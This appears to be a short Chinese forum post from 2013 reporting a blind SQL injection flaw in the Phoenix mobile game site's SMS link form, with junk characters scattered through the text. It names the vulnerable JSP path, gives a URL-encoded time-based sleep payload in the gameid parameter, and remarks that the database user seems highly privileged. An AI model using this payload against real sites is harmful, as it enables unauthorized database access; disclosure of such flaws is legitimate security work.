简要描述: h5 o; u) f+ ]3 Z5 K
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
D( G) a0 L Y' d. M* M2 e, H+ x: o+ {
详细说明:2 G3 ^3 J- D; G5 E
存在SQL盲注url:/ @1 h) g7 {: N) \* i
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=12 Q* J+ K$ |' E& D' o
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
& O; C; d% D, V1 j2 u8 s# [http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png5 M* K3 \: k) q- t, }6 p; L& A
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg; |) p9 d& E3 d" v% W* a- f& P* d2 b
0 W) c$ D v+ U4 @& K
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对